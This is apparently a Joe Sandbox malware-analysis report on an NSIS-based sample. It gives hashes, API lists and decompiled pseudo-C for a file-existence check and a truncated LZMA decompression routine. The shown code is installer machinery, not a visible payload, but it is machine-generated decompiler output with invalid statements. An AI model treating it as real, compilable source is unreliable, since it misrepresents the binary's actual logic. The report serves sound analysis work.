                            control_flow_graph 713 40603f-40605a call 406668 call 405fe2 718 406060-40606d call 4068ef 713->718 719 40605c-40605e 713->719 723 40607d-406081 718->723 724 40606f-406075 718->724 720 4060b8-4060ba 719->720 726 406097-4060a0 lstrlenW 723->726 724->719 725 406077-40607b 724->725 725->719 725->723 727 4060a2-4060b6 call 405f37 GetFileAttributesW 726->727 728 406083-40608a call 40699e 726->728 727->720 733 406091-406092 call 405f83 728->733 734 40608c-40608f 728->734 733->726 734->719 734->733
                            C-Code - Quality: 53%
                            			E0040603F(void* __eflags, intOrPtr _a4) {
                            				int _t11;
                            				signed char* _t12;
                            				long _t16;
                            				intOrPtr _t18;
                            				intOrPtr* _t21;
                            				signed int _t23;
                            
                            				E00406668(0x425f50, _a4);
                            				_t21 = E00405FE2(0x425f50);
                            				if(_t21 != 0) {
                            					E004068EF(_t21);
                            					if(( *0x42a278 & 0x00000080) == 0) {
                            						L5:
                            						_t23 = _t21 - 0x425f50 >> 1;
                            						while(1) {
                            							_t11 = lstrlenW(0x425f50);
                            							_push(0x425f50);
                            							if(_t11 <= _t23) {
                            								break;
                            							}
                            							_t12 = E0040699E();
                            							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                            								E00405F83(0x425f50);
                            								continue;
                            							} else {
                            								goto L1;
                            							}
                            						}
                            						E00405F37();
                            						_t16 = GetFileAttributesW(??); // executed
                            						return 0 | _t16 != 0xffffffff;
                            					}
                            					_t18 =  *_t21;
                            					if(_t18 == 0 || _t18 == 0x5c) {
                            						goto L1;
                            					} else {
                            						goto L5;
                            					}
                            				}
                            				L1:
                            				return 0;
                            			}










                            APIs
                              • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                              • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,766DFAA0,?,766DF560,00405D94,?,766DFAA0,766DF560,00000000), ref: 00405FF0
                              • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                              • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                            • lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50,766DFAA0,?,766DF560,00405D94,?,766DFAA0,766DF560,00000000), ref: 00406098
                            • GetFileAttributesW.KERNELBASE(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50,766DFAA0,?,766DF560,00405D94,?,766DFAA0,766DF560), ref: 004060A8
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                            • String ID: P_B
                            • API String ID: 3248276644-906794629
                            • Opcode ID: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                            • Instruction ID: df110f430b83b9381375b5fd3fa67f6c4419d4890c6468873e0fced3c2676832
                            • Opcode Fuzzy Hash: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                            • Instruction Fuzzy Hash: 0DF07826144A1216E622B23A0C05BAF05098F82354B07063FFC93B22E1DF3C8973C43E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            [Figure: control-flow graph of function 00407194; legend: Executed / Not Executed]
                            C-Code - Quality: 99%
                            			E00407194() {
                            				signed int _t530;
                            				void _t537;
                            				signed int _t538;
                            				signed int _t539;
                            				unsigned short _t569;
                            				signed int _t579;
                            				signed int _t607;
                            				void* _t627;
                            				signed int _t628;
                            				signed int _t635;
                            				signed int* _t643;
                            				void* _t644;
                            
                            				L0:
                            				while(1) {
                            					L0:
                            					_t530 =  *(_t644 - 0x30);
                            					if(_t530 >= 4) {
                            					}
                            					 *(_t644 - 0x40) = 6;
                            					 *(_t644 - 0x7c) = 0x19;
                            					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
                            					while(1) {
                            						L145:
                            						 *(_t644 - 0x50) = 1;
                            						 *(_t644 - 0x48) =  *(_t644 - 0x40);
                            						while(1) {
                            							L149:
                            							if( *(_t644 - 0x48) <= 0) {
                            								goto L155;
                            							}
                            							L150:
                            							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
                            							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
                            							 *(_t644 - 0x54) = _t643;
                            							_t569 =  *_t643;
                            							_t635 = _t569 & 0x0000ffff;
                            							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
                            							if( *(_t644 - 0xc) >= _t607) {
                            								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
                            								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
                            								_t628 = _t627 + 1;
                            								 *_t643 = _t569 - (_t569 >> 5);
                            								 *(_t644 - 0x50) = _t628;
                            							} else {
                            								 *(_t644 - 0x10) = _t607;
                            								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
                            								 *_t643 = (0x800 - _t635 >> 5) + _t569;
                            							}
                            							if( *(_t644 - 0x10) >= 0x1000000) {
                            								L148:
                            								_t487 = _t644 - 0x48;
                            								 *_t487 =  *(_t644 - 0x48) - 1;
                            								L149:
                            								if( *(_t644 - 0x48) <= 0) {
                            									goto L155;
                            								}
                            								goto L150;
                            							} else {
                            								L154:
                            								L146:
                            								if( *(_t644 - 0x6c) == 0) {
                            									L169:
                            									 *(_t644 - 0x88) = 0x18;
                            									L170:
                            									_t579 = 0x22;
                            									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
                            									_t539 = 0;
                            									L172:
                            									return _t539;
                            								}
                            								L147:
                            								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                            								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                            								_t484 = _t644 - 0x70;
                            								 *_t484 =  &(( *(_t644 - 0x70))[1]);
                            								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                            								goto L148;
                            							}
                            							L155:
                            							_t537 =  *(_t644 - 0x7c);
                            							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
                            							while(1) {
                            								L140:
                            								 *(_t644 - 0x88) = _t537;
                            								while(1) {
                            									L1:
                            									_t538 =  *(_t644 - 0x88);
                            									if(_t538 > 0x1c) {
                            										break;
                            									}
                            									L2:
                            									switch( *((intOrPtr*)(_t538 * 4 +  &M00407602))) {
                            										case 0:
                            											L3:
                            											if( *(_t644 - 0x6c) == 0) {
                            												goto L170;
                            											}
                            											L4:
                            											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                            											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                            											_t538 =  *( *(_t644 - 0x70));
                            											if(_t538 > 0xe1) {
                            												goto L171;
                            											}
                            											L5:
                            											_t542 = _t538 & 0x000000ff;
                            											_push(0x2d);
                            											asm("cdq");
                            											_pop(_t581);
                            											_push(9);
                            											_pop(_t582);
                            											_t638 = _t542 / _t581;
                            											_t544 = _t542 % _t581 & 0x000000ff;
                            											asm("cdq");
                            											_t633 = _t544 % _t582 & 0x000000ff;
                            											 *(_t644 - 0x3c) = _t633;
                            											 *(_t644 - 0x1c) = (1 << _t638) - 1;
                            											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
                            											_t641 = (0x300 << _t633 + _t638) + 0x736;
                            											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
                            												L10:
                            												if(_t641 == 0) {
                            													L12:
                            													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
                            													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                            													goto L15;
                            												} else {
                            													goto L11;
                            												}
                            												do {
                            													L11:
                            													_t641 = _t641 - 1;
                            													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
                            												} while (_t641 != 0);
                            												goto L12;
                            											}
                            											L6:
                            											if( *(_t644 - 4) != 0) {
                            												GlobalFree( *(_t644 - 4));
                            											}
                            											_t538 = GlobalAlloc(0x40, 0x600); // executed
                            											 *(_t644 - 4) = _t538;
                            											if(_t538 == 0) {
                            												goto L171;
                            											} else {
                            												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
                            												goto L10;
                            											}
                            										case 1:
                            											L13:
                            											__eflags =  *(_t644 - 0x6c);
                            											if( *(_t644 - 0x6c) == 0) {
                            												L157:
                            												 *(_t644 - 0x88) = 1;
                            												goto L170;
                            											}
                            											L14:
                            											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                            											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
                            											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                            											_t45 = _t644 - 0x48;
                            											 *_t45 =  *(_t644 - 0x48) + 1;
                            											__eflags =  *_t45;
                            											L15:
                            											if( *(_t644 - 0x48) < 4) {
                            												goto L13;
                            											}
                            											L16:
                            											_t550 =  *(_t644 - 0x40);
                            											if(_t550 ==  *(_t644 - 0x74)) {
                            												L20:
                            												 *(_t644 - 0x48) = 5;
                            												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
                            												goto L23;
                            											}
                            											L17:
                            											 *(_t644 - 0x74) = _t550;
                            											if( *(_t644 - 8) != 0) {
                            												GlobalFree( *(_t644 - 8));
                            											}
                            											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
                            											 *(_t644 - 8) = _t538;
                            											if(_t538 == 0) {
                            												goto L171;
                            											} else {
                            												goto L20;
                            											}
                            										case 2:
                            											L24:
                            											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
                            											 *(_t644 - 0x84) = 6;
                            											 *(_t644 - 0x4c) = _t557;
                            											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
                            											goto L132;
                            										case 3:
                            											L21:
                            											__eflags =  *(_t644 - 0x6c);
                            											if( *(_t644 - 0x6c) == 0) {
                            												L158:
                            												 *(_t644 - 0x88) = 3;
                            												goto L170;
                            											}
                            											L22:
                            											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                            											_t67 = _t644 - 0x70;
                            											 *_t67 =  &(( *(_t644 - 0x70))[1]);
                            											__eflags =  *_t67;
                            											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                            											L23:
                            											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
                            											if( *(_t644 - 0x48) != 0) {
                            												goto L21;
                            											}
                            											goto L24;
                            										case 4:
                            											L133:
                            											_t559 =  *_t642;
                            											_t626 = _t559 & 0x0000ffff;
                            											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
                            											if( *(_t644 - 0xc) >= _t596) {
                            												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
                            												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
                            												 *(_t644 - 0x40) = 1;
                            												_t560 = _t559 - (_t559 >> 5);
                            												__eflags = _t560;
                            												 *_t642 = _t560;
                            											} else {
                            												 *(_t644 - 0x10) = _t596;
                            												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                            												 *_t642 = (0x800 - _t626 >> 5) + _t559;
                            											}
                            											if( *(_t644 - 0x10) >= 0x1000000) {
                            												goto L139;
                            											} else {
                            												goto L137;
                            											}
                            										case 5:
                            											L137:
                            											if( *(_t644 - 0x6c) == 0) {
                            												L168:
                            												 *(_t644 - 0x88) = 5;
                            												goto L170;
                            											}
                            											L138:
                            											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                            											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                            											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                            											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                            											L139:
                            											_t537 =  *(_t644 - 0x84);
                            											L140:
                            											 *(_t644 - 0x88) = _t537;
                            											goto L1;
                            										case 6:
                            											L25:
                            											__edx = 0;
                            											__eflags =  *(__ebp - 0x40);
                            											if( *(__ebp - 0x40) != 0) {
                            												L36:
                            												__eax =  *(__ebp - 4);
                            												__ecx =  *(__ebp - 0x38);
                            												 *(__ebp - 0x34) = 1;
                            												 *(__ebp - 0x84) = 7;
                            												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                            												goto L132;
                            											}
                            											L26:
                            											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                            											__esi =  *(__ebp - 0x60);
                            											__cl = 8;
                            											__cl = 8 -  *(__ebp - 0x3c);
                            											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                            											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                            											__ecx =  *(__ebp - 0x3c);
                            											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                            											__ecx =  *(__ebp - 4);
                            											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                            											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                            											__eflags =  *(__ebp - 0x38) - 4;
                            											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                            											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                            											if( *(__ebp - 0x38) >= 4) {
                            												__eflags =  *(__ebp - 0x38) - 0xa;
                            												if( *(__ebp - 0x38) >= 0xa) {
                            													_t98 = __ebp - 0x38;
                            													 *_t98 =  *(__ebp - 0x38) - 6;
                            													__eflags =  *_t98;
                            												} else {
                            													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                            												}
                            											} else {
                            												 *(__ebp - 0x38) = 0;
                            											}
                            											__eflags =  *(__ebp - 0x34) - __edx;
                            											if( *(__ebp - 0x34) == __edx) {
                            												L35:
                            												__ebx = 0;
                            												__ebx = 1;
                            												goto L61;
                            											} else {
                            												L32:
                            												__eax =  *(__ebp - 0x14);
                            												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                            												__eflags = __eax -  *(__ebp - 0x74);
                            												if(__eax >=  *(__ebp - 0x74)) {
                            													__eax = __eax +  *(__ebp - 0x74);
                            													__eflags = __eax;
                            												}
                            												__ecx =  *(__ebp - 8);
                            												__ebx = 0;
                            												__ebx = 1;
                            												__al =  *((intOrPtr*)(__eax + __ecx));
                            												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                            												goto L41;
                            											}
                            										case 7:
                            											L66:
                            											__eflags =  *(__ebp - 0x40) - 1;
                            											if( *(__ebp - 0x40) != 1) {
                            												L68:
                            												__eax =  *(__ebp - 0x24);
                            												 *(__ebp - 0x80) = 0x16;
                            												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                            												__eax =  *(__ebp - 0x28);
                            												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                            												__eax =  *(__ebp - 0x2c);
                            												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                            												__eax = 0;
                            												__eflags =  *(__ebp - 0x38) - 7;
                            												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                            												__al = __al & 0x000000fd;
                            												__eax = (__eflags >= 0) - 1 + 0xa;
                            												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                            												__eax =  *(__ebp - 4);
                            												__eax =  *(__ebp - 4) + 0x664;
                            												__eflags = __eax;
                            												 *(__ebp - 0x58) = __eax;
                            												goto L69;
                            											}
                            											L67:
                            											__eax =  *(__ebp - 4);
                            											__ecx =  *(__ebp - 0x38);
                            											 *(__ebp - 0x84) = 8;
                            											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                            											goto L132;
                            										case 8:
                            											L70:
                            											__eflags =  *(__ebp - 0x40);
                            											if( *(__ebp - 0x40) != 0) {
                            												__eax =  *(__ebp - 4);
                            												__ecx =  *(__ebp - 0x38);
                            												 *(__ebp - 0x84) = 0xa;
                            												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                            											} else {
                            												__eax =  *(__ebp - 0x38);
                            												__ecx =  *(__ebp - 4);
                            												__eax =  *(__ebp - 0x38) + 0xf;
                            												 *(__ebp - 0x84) = 9;
                            												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                            												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                            											}
                            											goto L132;
                            										case 9:
                            											L73:
                            											__eflags =  *(__ebp - 0x40);
                            											if( *(__ebp - 0x40) != 0) {
                            												goto L90;
                            											}
                            											L74:
                            											__eflags =  *(__ebp - 0x60);
                            											if( *(__ebp - 0x60) == 0) {
                            												goto L171;
                            											}
                            											L75:
                            											__eax = 0;
                            											__eflags =  *(__ebp - 0x38) - 7;
                            											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                            											__eflags = _t259;
                            											0 | _t259 = _t259 + _t259 + 9;
                            											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                            											goto L76;
                            										case 0xa:
                            											L82:
                            											__eflags =  *(__ebp - 0x40);
                            											if( *(__ebp - 0x40) != 0) {
                            												L84:
                            												__eax =  *(__ebp - 4);
                            												__ecx =  *(__ebp - 0x38);
                            												 *(__ebp - 0x84) = 0xb;
                            												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                            												goto L132;
                            											}
                            											L83:
                            											__eax =  *(__ebp - 0x28);
                            											goto L89;
                            										case 0xb:
                            											L85:
                            											__eflags =  *(__ebp - 0x40);
                            											if( *(__ebp - 0x40) != 0) {
                            												__ecx =  *(__ebp - 0x24);
                            												__eax =  *(__ebp - 0x20);
                            												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                            											} else {
                            												__eax =  *(__ebp - 0x24);
                            											}
                            											__ecx =  *(__ebp - 0x28);
                            											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                            											L89:
                            											__ecx =  *(__ebp - 0x2c);
                            											 *(__ebp - 0x2c) = __eax;
                            											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                            											L90:
                            											__eax =  *(__ebp - 4);
                            											 *(__ebp - 0x80) = 0x15;
                            											__eax =  *(__ebp - 4) + 0xa68;
                            											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                            											goto L69;
                            										case 0xc:
                            											L99:
                            											__eflags =  *(__ebp - 0x6c);
                            											if( *(__ebp - 0x6c) == 0) {
                            												L164:
                            												 *(__ebp - 0x88) = 0xc;
                            												goto L170;
                            											}
                            											L100:
                            											__ecx =  *(__ebp - 0x70);
                            											__eax =  *(__ebp - 0xc);
                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            											_t334 = __ebp - 0x70;
                            											 *_t334 =  *(__ebp - 0x70) + 1;
                            											__eflags =  *_t334;
                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            											__eax =  *(__ebp - 0x2c);
                            											goto L101;
                            										case 0xd:
                            											L37:
                            											__eflags =  *(__ebp - 0x6c);
                            											if( *(__ebp - 0x6c) == 0) {
                            												L159:
                            												 *(__ebp - 0x88) = 0xd;
                            												goto L170;
                            											}
                            											L38:
                            											__ecx =  *(__ebp - 0x70);
                            											__eax =  *(__ebp - 0xc);
                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            											_t122 = __ebp - 0x70;
                            											 *_t122 =  *(__ebp - 0x70) + 1;
                            											__eflags =  *_t122;
                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            											L39:
                            											__eax =  *(__ebp - 0x40);
                            											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                            											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                            												goto L48;
                            											}
                            											L40:
                            											__eflags = __ebx - 0x100;
                            											if(__ebx >= 0x100) {
                            												goto L54;
                            											}
                            											L41:
                            											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                            											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                            											__ecx =  *(__ebp - 0x58);
                            											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                            											 *(__ebp - 0x48) = __eax;
                            											__eax = __eax + 1;
                            											__eax = __eax << 8;
                            											__eax = __eax + __ebx;
                            											__esi =  *(__ebp - 0x58) + __eax * 2;
                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                            											__ax =  *__esi;
                            											 *(__ebp - 0x54) = __esi;
                            											__edx = __ax & 0x0000ffff;
                            											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                            											__eflags =  *(__ebp - 0xc) - __ecx;
                            											if( *(__ebp - 0xc) >= __ecx) {
                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                            												__cx = __ax;
                            												 *(__ebp - 0x40) = 1;
                            												__cx = __ax >> 5;
                            												__eflags = __eax;
                            												__ebx = __ebx + __ebx + 1;
                            												 *__esi = __ax;
                            											} else {
                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                            												 *(__ebp - 0x10) = __ecx;
                            												0x800 = 0x800 - __edx;
                            												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                            												__ebx = __ebx + __ebx;
                            												 *__esi = __cx;
                            											}
                            											__eflags =  *(__ebp - 0x10) - 0x1000000;
                            											 *(__ebp - 0x44) = __ebx;
                            											if( *(__ebp - 0x10) >= 0x1000000) {
                            												goto L39;
                            											} else {
                            												L45:
                            												goto L37;
                            											}
                            										case 0xe:
                            											L46:
                            											__eflags =  *(__ebp - 0x6c);
                            											if( *(__ebp - 0x6c) == 0) {
                            												L160:
                            												 *(__ebp - 0x88) = 0xe;
                            												goto L170;
                            											}
                            											L47:
                            											__ecx =  *(__ebp - 0x70);
                            											__eax =  *(__ebp - 0xc);
                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            											_t156 = __ebp - 0x70;
                            											 *_t156 =  *(__ebp - 0x70) + 1;
                            											__eflags =  *_t156;
                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            											while(1) {
                            												L48:
                            												__eflags = __ebx - 0x100;
                            												if(__ebx >= 0x100) {
                            													break;
                            												}
                            												L49:
                            												__eax =  *(__ebp - 0x58);
                            												__edx = __ebx + __ebx;
                            												__ecx =  *(__ebp - 0x10);
                            												__esi = __edx + __eax;
                            												__ecx =  *(__ebp - 0x10) >> 0xb;
                            												__ax =  *__esi;
                            												 *(__ebp - 0x54) = __esi;
                            												__edi = __ax & 0x0000ffff;
                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                            												__eflags =  *(__ebp - 0xc) - __ecx;
                            												if( *(__ebp - 0xc) >= __ecx) {
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                            													__cx = __ax;
                            													_t170 = __edx + 1; // 0x1
                            													__ebx = _t170;
                            													__cx = __ax >> 5;
                            													__eflags = __eax;
                            													 *__esi = __ax;
                            												} else {
                            													 *(__ebp - 0x10) = __ecx;
                            													0x800 = 0x800 - __edi;
                            													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                            													__ebx = __ebx + __ebx;
                            													 *__esi = __cx;
                            												}
                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                            												 *(__ebp - 0x44) = __ebx;
                            												if( *(__ebp - 0x10) >= 0x1000000) {
                            													continue;
                            												} else {
                            													L53:
                            													goto L46;
                            												}
                            											}
                            											L54:
                            											_t173 = __ebp - 0x34;
                            											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                            											__eflags =  *_t173;
                            											goto L55;
                            										case 0xf:
                            											L58:
                            											__eflags =  *(__ebp - 0x6c);
                            											if( *(__ebp - 0x6c) == 0) {
                            												L161:
                            												 *(__ebp - 0x88) = 0xf;
                            												goto L170;
                            											}
                            											L59:
                            											__ecx =  *(__ebp - 0x70);
                            											__eax =  *(__ebp - 0xc);
                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            											_t203 = __ebp - 0x70;
                            											 *_t203 =  *(__ebp - 0x70) + 1;
                            											__eflags =  *_t203;
                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            											L60:
                            											__eflags = __ebx - 0x100;
                            											if(__ebx >= 0x100) {
                            												L55:
                            												__al =  *(__ebp - 0x44);
                            												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                            												goto L56;
                            											}
                            											L61:
                            											__eax =  *(__ebp - 0x58);
                            											__edx = __ebx + __ebx;
                            											__ecx =  *(__ebp - 0x10);
                            											__esi = __edx + __eax;
                            											__ecx =  *(__ebp - 0x10) >> 0xb;
                            											__ax =  *__esi;
                            											 *(__ebp - 0x54) = __esi;
                            											__edi = __ax & 0x0000ffff;
                            											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                            											__eflags =  *(__ebp - 0xc) - __ecx;
                            											if( *(__ebp - 0xc) >= __ecx) {
                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                            												__cx = __ax;
                            												_t217 = __edx + 1; // 0x1
                            												__ebx = _t217;
                            												__cx = __ax >> 5;
                            												__eflags = __eax;
                            												 *__esi = __ax;
                            											} else {
                            												 *(__ebp - 0x10) = __ecx;
                            												0x800 = 0x800 - __edi;
                            												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                            												__ebx = __ebx + __ebx;
                            												 *__esi = __cx;
                            											}
                            											__eflags =  *(__ebp - 0x10) - 0x1000000;
                            											 *(__ebp - 0x44) = __ebx;
                            											if( *(__ebp - 0x10) >= 0x1000000) {
                            												goto L60;
